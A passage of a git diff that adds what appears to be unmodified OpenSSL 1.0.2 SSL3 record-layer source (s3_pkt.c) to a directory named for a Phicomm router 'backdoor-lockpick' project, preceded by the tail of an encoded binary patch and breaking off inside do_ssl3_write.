zis1K?M$;jU>+-h^(MiD{B#q`B!5<R*jNlIo{*mCkM?|sUkB~+)68urY$Aa^>0nwV^
z{QX6AQSiq|qq!vbA;B*T{<z>*1aArcjo?oRzAiYQ4MZD);~C<%NdoJCm?79}f<Gnr
zkAgof_)mgABls=BpB21C8gr5PEL8ZU)?U6kG(lH+xyh`JS!H?<ct($n^6<5%yl$Q=
zucYN`5R{jt$_vxsP$w`eNsad4c6Bs2@av;~FDblHmX6?^vP#}M_Ls9@s41uaVp`yg
zHNLYFq(gmK8$>u)Hmn2QsyY&aUZ*Qen>gNA(07{p`^n-nL0-MF^=Q0ms_VZ96ENn#
z^?w<B>(*Zbj_tNJlmD%WvSJQQ-TrUU{;$v>!u{jjxw`*FV7NZl31rz~+UN@m$nyT#
zE&*pPr+!ffYvz6c3{#b79phXk{}y&c<NO&J5ID8!zd`;To=CRpp8~I|-x^(wxh_~g
zMC{M!r*3Ur>UUaylMV)cYcNLDA8+Q>vja$N;KPFUE5)(Bf7TkmF?Igyl>d2lBwGom
F{sxrwM&AGc

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_pkt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_pkt.c
new file mode 100644
index 0000000..ec56c55
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_pkt.c
@@ -0,0 +1,1732 @@
+/* ssl/s3_pkt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <limits.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "ssl_locl.h"
+#include <openssl/evp.h>
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+
+#ifndef  EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+# define EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK 0
+#endif
+
+#if     defined(OPENSSL_SMALL_FOOTPRINT) || \
+        !(      defined(AES_ASM) &&     ( \
+                defined(__x86_64)       || defined(__x86_64__)  || \
+                defined(_M_AMD64)       || defined(_M_X64)      || \
+                defined(__INTEL__)      ) \
+        )
+# undef EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+# define EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK 0
+#endif
+
+static int do_ssl3_write(SSL *s, int type, const unsigned char *buf,
+                         unsigned int len, int create_empty_fragment);
+static int ssl3_get_record(SSL *s);
+
+int ssl3_read_n(SSL *s, int n, int max, int extend)
+{
+    /*
+     * If extend == 0, obtain new n-byte packet; if extend == 1, increase
+     * packet by another n bytes. The packet will be in the sub-array of
+     * s->s3->rbuf.buf specified by s->packet and s->packet_length. (If
+     * s->read_ahead is set, 'max' bytes may be stored in rbuf [plus
+     * s->packet_length bytes if extend == 1].)
+     */
+    int i, len, left;
+    long align = 0;
+    unsigned char *pkt;
+    SSL3_BUFFER *rb;
+
+    if (n <= 0)
+        return n;
+
+    rb = &(s->s3->rbuf);
+    if (rb->buf == NULL)
+        if (!ssl3_setup_read_buffer(s))
+            return -1;
+
+    left = rb->left;
+#if defined(SSL3_ALIGN_PAYLOAD) && SSL3_ALIGN_PAYLOAD!=0
+    align = (long)rb->buf + SSL3_RT_HEADER_LENGTH;
+    align = (-align) & (SSL3_ALIGN_PAYLOAD - 1);
+#endif
+
+    if (!extend) {
+        /* start with empty packet ... */
+        if (left == 0)
+            rb->offset = align;
+        else if (align != 0 && left >= SSL3_RT_HEADER_LENGTH) {
+            /*
+             * check if next packet length is large enough to justify payload
+             * alignment...
+             */
+            pkt = rb->buf + rb->offset;
+            if (pkt[0] == SSL3_RT_APPLICATION_DATA
+                && (pkt[3] << 8 | pkt[4]) >= 128) {
+                /*
+                 * Note that even if packet is corrupted and its length field
+                 * is insane, we can only be led to wrong decision about
+                 * whether memmove will occur or not. Header values has no
+                 * effect on memmove arguments and therefore no buffer
+                 * overrun can be triggered.
+                 */
+                memmove(rb->buf + align, pkt, left);
+                rb->offset = align;
+            }
+        }
+        s->packet = rb->buf + rb->offset;
+        s->packet_length = 0;
+        /* ... now we can act as if 'extend' was set */
+    }
+
+    /*
+     * For DTLS/UDP reads should not span multiple packets because the read
+     * operation returns the whole packet at once (as long as it fits into
+     * the buffer).
+     */
+    if (SSL_IS_DTLS(s)) {
+        if (left == 0 && extend)
+            return 0;
+        if (left > 0 && n > left)
+            n = left;
+    }
+
+    /* if there is enough in the buffer from a previous read, take some */
+    if (left >= n) {
+        s->packet_length += n;
+        rb->left = left - n;
+        rb->offset += n;
+        return (n);
+    }
+
+    /* else we need to read more data */
+
+    len = s->packet_length;
+    pkt = rb->buf + align;
+    /*
+     * Move any available bytes to front of buffer: 'len' bytes already
+     * pointed to by 'packet', 'left' extra ones at the end
+     */
+    if (s->packet != pkt) {     /* len > 0 */
+        memmove(pkt, s->packet, len + left);
+        s->packet = pkt;
+        rb->offset = len + align;
+    }
+
+    if (n > (int)(rb->len - rb->offset)) { /* does not happen */
+        SSLerr(SSL_F_SSL3_READ_N, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+
+    if (!s->read_ahead)
+        /* ignore max parameter */
+        max = n;
+    else {
+        if (max < n)
+            max = n;
+        if (max > (int)(rb->len - rb->offset))
+            max = rb->len - rb->offset;
+    }
+
+    while (left < n) {
+        /*
+         * Now we have len+left bytes at the front of s->s3->rbuf.buf and
+         * need to read in more until we have len+n (up to len+max if
+         * possible)
+         */
+
+        clear_sys_error();
+        if (s->rbio != NULL) {
+            s->rwstate = SSL_READING;
+            i = BIO_read(s->rbio, pkt + len + left, max - left);
+        } else {
+            SSLerr(SSL_F_SSL3_READ_N, SSL_R_READ_BIO_NOT_SET);
+            i = -1;
+        }
+
+        if (i <= 0) {
+            rb->left = left;
+            if (s->mode & SSL_MODE_RELEASE_BUFFERS && !SSL_IS_DTLS(s))
+                if (len + left == 0)
+                    ssl3_release_read_buffer(s);
+            return (i);
+        }
+        left += i;
+        /*
+         * reads should *never* span multiple packets for DTLS because the
+         * underlying transport protocol is message oriented as opposed to
+         * byte oriented as in the TLS case.
+         */
+        if (SSL_IS_DTLS(s)) {
+            if (n > left)
+                n = left;       /* makes the while condition false */
+        }
+    }
+
+    /* done reading, now the book-keeping */
+    rb->offset += n;
+    rb->left = left - n;
+    s->packet_length += n;
+    s->rwstate = SSL_NOTHING;
+    return (n);
+}
+
+/*
+ * MAX_EMPTY_RECORDS defines the number of consecutive, empty records that
+ * will be processed per call to ssl3_get_record. Without this limit an
+ * attacker could send empty records at a faster rate than we can process and
+ * cause ssl3_get_record to loop forever.
+ */
+#define MAX_EMPTY_RECORDS 32
+
+/*-
+ * Call this to get a new input record.
+ * It will return <= 0 if more data is needed, normally due to an error
+ * or non-blocking IO.
+ * When it finishes, one packet has been decoded and can be found in
+ * ssl->s3->rrec.type    - is the type of record
+ * ssl->s3->rrec.data,   - data
+ * ssl->s3->rrec.length, - number of bytes
+ */
+/* used only by ssl3_read_bytes */
+static int ssl3_get_record(SSL *s)
+{
+    int ssl_major, ssl_minor, al;
+    int enc_err, n, i, ret = -1;
+    SSL3_RECORD *rr;
+    SSL_SESSION *sess;
+    unsigned char *p;
+    unsigned char md[EVP_MAX_MD_SIZE];
+    short version;
+    unsigned mac_size, orig_len;
+    size_t extra;
+    unsigned empty_record_count = 0;
+
+    rr = &(s->s3->rrec);
+    sess = s->session;
+
+    if (s->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
+        extra = SSL3_RT_MAX_EXTRA;
+    else
+        extra = 0;
+    if (extra && !s->s3->init_extra) {
+        /*
+         * An application error: SLS_OP_MICROSOFT_BIG_SSLV3_BUFFER set after
+         * ssl3_setup_buffers() was done
+         */
+        SSLerr(SSL_F_SSL3_GET_RECORD, ERR_R_INTERNAL_ERROR);
+        return -1;
+    }
+
+ again:
+    /* check if we have the header */
+    if ((s->rstate != SSL_ST_READ_BODY) ||
+        (s->packet_length < SSL3_RT_HEADER_LENGTH)) {
+        n = ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
+        if (n <= 0)
+            return (n);         /* error or non-blocking */
+        s->rstate = SSL_ST_READ_BODY;
+
+        p = s->packet;
+        if (s->msg_callback)
+            s->msg_callback(0, 0, SSL3_RT_HEADER, p, 5, s,
+                            s->msg_callback_arg);
+
+        /* Pull apart the header into the SSL3_RECORD */
+        rr->type = *(p++);
+        ssl_major = *(p++);
+        ssl_minor = *(p++);
+        version = (ssl_major << 8) | ssl_minor;
+        n2s(p, rr->length);
+#if 0
+        fprintf(stderr, "Record type=%d, Length=%d\n", rr->type, rr->length);
+#endif
+
+        /* Lets check version */
+        if (!s->first_packet) {
+            if (version != s->version) {
+                SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_WRONG_VERSION_NUMBER);
+                if ((s->version & 0xFF00) == (version & 0xFF00)
+                    && !s->enc_write_ctx && !s->write_hash)
+                    /*
+                     * Send back error using their minor version number :-)
+                     */
+                    s->version = (unsigned short)version;
+                al = SSL_AD_PROTOCOL_VERSION;
+                goto f_err;
+            }
+        }
+
+        if ((version >> 8) != SSL3_VERSION_MAJOR) {
+            SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_WRONG_VERSION_NUMBER);
+            goto err;
+        }
+
+        if (rr->length > s->s3->rbuf.len - SSL3_RT_HEADER_LENGTH) {
+            al = SSL_AD_RECORD_OVERFLOW;
+            SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_PACKET_LENGTH_TOO_LONG);
+            goto f_err;
+        }
+
+        /* now s->rstate == SSL_ST_READ_BODY */
+    }
+
+    /* s->rstate == SSL_ST_READ_BODY, get and decode the data */
+
+    if (rr->length > s->packet_length - SSL3_RT_HEADER_LENGTH) {
+        /* now s->packet_length == SSL3_RT_HEADER_LENGTH */
+        i = rr->length;
+        n = ssl3_read_n(s, i, i, 1);
+        if (n <= 0)
+            return (n);         /* error or non-blocking io */
+        /*
+         * now n == rr->length, and s->packet_length == SSL3_RT_HEADER_LENGTH
+         * + rr->length
+         */
+    }
+
+    s->rstate = SSL_ST_READ_HEADER; /* set state for later operations */
+
+    /*
+     * At this point, s->packet_length == SSL3_RT_HEADER_LNGTH + rr->length,
+     * and we have that many bytes in s->packet
+     */
+    rr->input = &(s->packet[SSL3_RT_HEADER_LENGTH]);
+
+    /*
+     * ok, we can now read from 's->packet' data into 'rr' rr->input points
+     * at rr->length bytes, which need to be copied into rr->data by either
+     * the decryption or by the decompression When the data is 'copied' into
+     * the rr->data buffer, rr->input will be pointed at the new buffer
+     */
+
+    /*
+     * We now have - encrypted [ MAC [ compressed [ plain ] ] ] rr->length
+     * bytes of encrypted compressed stuff.
+     */
+
+    /* check is not needed I believe */
+    if (rr->length > SSL3_RT_MAX_ENCRYPTED_LENGTH + extra) {
+        al = SSL_AD_RECORD_OVERFLOW;
+        SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_ENCRYPTED_LENGTH_TOO_LONG);
+        goto f_err;
+    }
+
+    /* decrypt in place in 'rr->input' */
+    rr->data = rr->input;
+
+    enc_err = s->method->ssl3_enc->enc(s, 0);
+    /*-
+     * enc_err is:
+     *    0: (in non-constant time) if the record is publically invalid.
+     *    1: if the padding is valid
+     *    -1: if the padding is invalid
+     */
+    if (enc_err == 0) {
+        al = SSL_AD_DECRYPTION_FAILED;
+        SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_BLOCK_CIPHER_PAD_IS_WRONG);
+        goto f_err;
+    }
+#ifdef TLS_DEBUG
+    printf("dec %d\n", rr->length);
+    {
+        unsigned int z;
+        for (z = 0; z < rr->length; z++)
+            printf("%02X%c", rr->data[z], ((z + 1) % 16) ? ' ' : '\n');
+    }
+    printf("\n");
+#endif
+
+    /* r->length is now the compressed data plus mac */
+    if ((sess != NULL) &&
+        (s->enc_read_ctx != NULL) && (EVP_MD_CTX_md(s->read_hash) != NULL)) {
+        /* s->read_hash != NULL => mac_size != -1 */
+        unsigned char *mac = NULL;
+        unsigned char mac_tmp[EVP_MAX_MD_SIZE];
+        mac_size = EVP_MD_CTX_size(s->read_hash);
+        OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
+
+        /*
+         * kludge: *_cbc_remove_padding passes padding length in rr->type
+         */
+        orig_len = rr->length + ((unsigned int)rr->type >> 8);
+
+        /*
+         * orig_len is the length of the record before any padding was
+         * removed. This is public information, as is the MAC in use,
+         * therefore we can safely process the record in a different amount
+         * of time if it's too short to possibly contain a MAC.
+         */
+        if (orig_len < mac_size ||
+            /* CBC records must have a padding length byte too. */
+            (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
+             orig_len < mac_size + 1)) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+
+        if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE) {
+            /*
+             * We update the length so that the TLS header bytes can be
+             * constructed correctly but we need to extract the MAC in
+             * constant time from within the record, without leaking the
+             * contents of the padding bytes.
+             */
+            mac = mac_tmp;
+            ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
+            rr->length -= mac_size;
+        } else {
+            /*
+             * In this case there's no padding, so |orig_len| equals
+             * |rec->length| and we checked that there's enough bytes for
+             * |mac_size| above.
+             */
+            rr->length -= mac_size;
+            mac = &rr->data[rr->length];
+        }
+
+        i = s->method->ssl3_enc->mac(s, md, 0 /* not send */ );
+        if (i < 0 || mac == NULL
+            || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
+            enc_err = -1;
+        if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH + extra + mac_size)
+            enc_err = -1;
+    }
+
+    if (enc_err < 0) {
+        /*
+         * A separate 'decryption_failed' alert was introduced with TLS 1.0,
+         * SSL 3.0 only has 'bad_record_mac'.  But unless a decryption
+         * failure is directly visible from the ciphertext anyway, we should
+         * not reveal which kind of error occured -- this might become
+         * visible to an attacker (e.g. via a logfile)
+         */
+        al = SSL_AD_BAD_RECORD_MAC;
+        SSLerr(SSL_F_SSL3_GET_RECORD,
+               SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
+        goto f_err;
+    }
+
+    /* r->length is now just compressed */
+    if (s->expand != NULL) {
+        if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH + extra) {
+            al = SSL_AD_RECORD_OVERFLOW;
+            SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_COMPRESSED_LENGTH_TOO_LONG);
+            goto f_err;
+        }
+        if (!ssl3_do_uncompress(s)) {
+            al = SSL_AD_DECOMPRESSION_FAILURE;
+            SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_BAD_DECOMPRESSION);
+            goto f_err;
+        }
+    }
+
+    if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH + extra) {
+        al = SSL_AD_RECORD_OVERFLOW;
+        SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_DATA_LENGTH_TOO_LONG);
+        goto f_err;
+    }
+
+    rr->off = 0;
+    /*-
+     * So at this point the following is true
+     * ssl->s3->rrec.type   is the type of record
+     * ssl->s3->rrec.length == number of bytes in record
+     * ssl->s3->rrec.off    == offset to first valid byte
+     * ssl->s3->rrec.data   == where to take bytes from, increment
+     *                         after use :-).
+     */
+
+    /* we have pulled in a full packet so zero things */
+    s->packet_length = 0;
+
+    /* just read a 0 length packet */
+    if (rr->length == 0) {
+        empty_record_count++;
+        if (empty_record_count > MAX_EMPTY_RECORDS) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_GET_RECORD, SSL_R_RECORD_TOO_SMALL);
+            goto f_err;
+        }
+        goto again;
+    }
+#if 0
+    fprintf(stderr, "Ultimate Record type=%d, Length=%d\n", rr->type,
+            rr->length);
+#endif
+
+    return (1);
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    return (ret);
+}
+
+int ssl3_do_uncompress(SSL *ssl)
+{
+#ifndef OPENSSL_NO_COMP
+    int i;
+    SSL3_RECORD *rr;
+
+    rr = &(ssl->s3->rrec);
+    i = COMP_expand_block(ssl->expand, rr->comp,
+                          SSL3_RT_MAX_PLAIN_LENGTH, rr->data,
+                          (int)rr->length);
+    if (i < 0)
+        return (0);
+    else
+        rr->length = i;
+    rr->data = rr->comp;
+#endif
+    return (1);
+}
+
+int ssl3_do_compress(SSL *ssl)
+{
+#ifndef OPENSSL_NO_COMP
+    int i;
+    SSL3_RECORD *wr;
+
+    wr = &(ssl->s3->wrec);
+    i = COMP_compress_block(ssl->compress, wr->data,
+                            SSL3_RT_MAX_COMPRESSED_LENGTH,
+                            wr->input, (int)wr->length);
+    if (i < 0)
+        return (0);
+    else
+        wr->length = i;
+
+    wr->input = wr->data;
+#endif
+    return (1);
+}
+
+/*
+ * Call this to write data in records of type 'type' It will return <= 0 if
+ * not all data has been sent or non-blocking IO.
+ */
+int ssl3_write_bytes(SSL *s, int type, const void *buf_, int len)
+{
+    const unsigned char *buf = buf_;
+    int tot;
+    unsigned int n, nw;
+#if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+    unsigned int max_send_fragment;
+#endif
+    SSL3_BUFFER *wb = &(s->s3->wbuf);
+    int i;
+
+    s->rwstate = SSL_NOTHING;
+    OPENSSL_assert(s->s3->wnum <= INT_MAX);
+    tot = s->s3->wnum;
+    s->s3->wnum = 0;
+
+    if (SSL_in_init(s) && !s->in_handshake) {
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_SSL3_WRITE_BYTES, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return -1;
+        }
+    }
+
+    /*
+     * ensure that if we end up with a smaller value of data to write out
+     * than the the original len from a write which didn't complete for
+     * non-blocking I/O and also somehow ended up avoiding the check for
+     * this in ssl3_write_pending/SSL_R_BAD_WRITE_RETRY as it must never be
+     * possible to end up with (len-tot) as a large number that will then
+     * promptly send beyond the end of the users buffer ... so we trap and
+     * report the error in a way the user will notice
+     */
+    if (len < tot) {
+        SSLerr(SSL_F_SSL3_WRITE_BYTES, SSL_R_BAD_LENGTH);
+        return (-1);
+    }
+
+    /*
+     * first check if there is a SSL3_BUFFER still being written out.  This
+     * will happen with non blocking IO
+     */
+    if (wb->left != 0) {
+        i = ssl3_write_pending(s, type, &buf[tot], s->s3->wpend_tot);
+        if (i <= 0) {
+            /* XXX should we ssl3_release_write_buffer if i<0? */
+            s->s3->wnum = tot;
+            return i;
+        }
+        tot += i;               /* this might be last fragment */
+    }
+#if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+    /*
+     * Depending on platform multi-block can deliver several *times*
+     * better performance. Downside is that it has to allocate
+     * jumbo buffer to accomodate up to 8 records, but the
+     * compromise is considered worthy.
+     */
+    if (type == SSL3_RT_APPLICATION_DATA &&
+        len >= 4 * (int)(max_send_fragment = s->max_send_fragment) &&
+        s->compress == NULL && s->msg_callback == NULL &&
+        SSL_USE_EXPLICIT_IV(s) &&
+        EVP_CIPHER_flags(s->enc_write_ctx->cipher) &
+        EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK) {
+        unsigned char aad[13];
+        EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM mb_param;
+        int packlen;
+
+        /* minimize address aliasing conflicts */
+        if ((max_send_fragment & 0xfff) == 0)
+            max_send_fragment -= 512;
+
+        if (tot == 0 || wb->buf == NULL) { /* allocate jumbo buffer */
+            ssl3_release_write_buffer(s);
+
+            packlen = EVP_CIPHER_CTX_ctrl(s->enc_write_ctx,
+                                          EVP_CTRL_TLS1_1_MULTIBLOCK_MAX_BUFSIZE,
+                                          max_send_fragment, NULL);
+
+            if (len >= 8 * (int)max_send_fragment)
+                packlen *= 8;
+            else
+                packlen *= 4;
+
+            wb->buf = OPENSSL_malloc(packlen);
+            wb->len = packlen;
+        } else if (tot == len) { /* done? */
+            OPENSSL_free(wb->buf); /* free jumbo buffer */
+            wb->buf = NULL;
+            return tot;
+        }
+
+        n = (len - tot);
+        for (;;) {
+            if (n < 4 * max_send_fragment) {
+                OPENSSL_free(wb->buf); /* free jumbo buffer */
+                wb->buf = NULL;
+                break;
+            }
+
+            if (s->s3->alert_dispatch) {
+                i = s->method->ssl_dispatch_alert(s);
+                if (i <= 0) {
+                    s->s3->wnum = tot;
+                    return i;
+                }
+            }
+
+            if (n >= 8 * max_send_fragment)
+                nw = max_send_fragment * (mb_param.interleave = 8);
+            else
+                nw = max_send_fragment * (mb_param.interleave = 4);
+
+            memcpy(aad, s->s3->write_sequence, 8);
+            aad[8] = type;
+            aad[9] = (unsigned char)(s->version >> 8);
+            aad[10] = (unsigned char)(s->version);
+            aad[11] = 0;
+            aad[12] = 0;
+            mb_param.out = NULL;
+            mb_param.inp = aad;
+            mb_param.len = nw;
+
+            packlen = EVP_CIPHER_CTX_ctrl(s->enc_write_ctx,
+                                          EVP_CTRL_TLS1_1_MULTIBLOCK_AAD,
+                                          sizeof(mb_param), &mb_param);
+
+            if (packlen <= 0 || packlen > (int)wb->len) { /* never happens */
+                OPENSSL_free(wb->buf); /* free jumbo buffer */
+                wb->buf = NULL;
+                break;
+            }
+
+            mb_param.out = wb->buf;
+            mb_param.inp = &buf[tot];
+            mb_param.len = nw;
+
+            if (EVP_CIPHER_CTX_ctrl(s->enc_write_ctx,
+                                    EVP_CTRL_TLS1_1_MULTIBLOCK_ENCRYPT,
+                                    sizeof(mb_param), &mb_param) <= 0)
+                return -1;
+
+            s->s3->write_sequence[7] += mb_param.interleave;
+            if (s->s3->write_sequence[7] < mb_param.interleave) {
+                int j = 6;
+                while (j >= 0 && (++s->s3->write_sequence[j--]) == 0) ;
+            }
+
+            wb->offset = 0;
+            wb->left = packlen;
+
+            s->s3->wpend_tot = nw;
+            s->s3->wpend_buf = &buf[tot];
+            s->s3->wpend_type = type;
+            s->s3->wpend_ret = nw;
+
+            i = ssl3_write_pending(s, type, &buf[tot], nw);
+            if (i <= 0) {
+                if (i < 0) {
+                    OPENSSL_free(wb->buf);
+                    wb->buf = NULL;
+                }
+                s->s3->wnum = tot;
+                return i;
+            }
+            if (i == (int)n) {
+                OPENSSL_free(wb->buf); /* free jumbo buffer */
+                wb->buf = NULL;
+                return tot + i;
+            }
+            n -= i;
+            tot += i;
+        }
+    } else
+#endif
+    if (tot == len) {           /* done? */
+        if (s->mode & SSL_MODE_RELEASE_BUFFERS && !SSL_IS_DTLS(s))
+            ssl3_release_write_buffer(s);
+
+        return tot;
+    }
+
+    n = (len - tot);
+    for (;;) {
+        if (n > s->max_send_fragment)
+            nw = s->max_send_fragment;
+        else
+            nw = n;
+
+        i = do_ssl3_write(s, type, &(buf[tot]), nw, 0);
+        if (i <= 0) {
+            /* XXX should we ssl3_release_write_buffer if i<0? */
+            s->s3->wnum = tot;
+            return i;
+        }
+
+        if ((i == (int)n) ||
+            (type == SSL3_RT_APPLICATION_DATA &&
+             (s->mode & SSL_MODE_ENABLE_PARTIAL_WRITE))) {
+            /*
+             * next chunk of data should get another prepended empty fragment
+             * in ciphersuites with known-IV weakness:
+             */
+            s->s3->empty_fragment_done = 0;
+
+            if ((i == (int)n) && s->mode & SSL_MODE_RELEASE_BUFFERS &&
+                !SSL_IS_DTLS(s))
+                ssl3_release_write_buffer(s);
+
+            return tot + i;
+        }
+
+        n -= i;
+        tot += i;
+    }
+}
+
+static int do_ssl3_write(SSL *s, int type, const unsigned char *buf,
+                         unsigned int len, int create_empty_fragment)
+{
+    unsigned char *p, *plen;
+    int i, mac_size, clear = 0;
+    int prefix_len = 0;
+    int eivlen;
+    long align = 0;
+    SSL3_RECORD *wr;
+    SSL3_BUFFER *wb = &(s->s3->wbuf);
+    SSL_SESSION *sess;
+
+    /*
+     * first check if there is a SSL3_BUFFER still being written out.  This
+     * will happen with non blocking IO
+     */
+    if (wb->left != 0)
+        return (ssl3_write_pending(s, type, buf, len));
+
+    /* If we have an alert to send, lets send it */
+    if (s->s3->alert_dispatch) {
+        i = s->method->ssl_dispatch_alert(s);
+        if (i <= 0)
+            return (i);
+        /* if it went, fall through and send more stuff */
+    }
+
+    if (wb->buf == NULL)
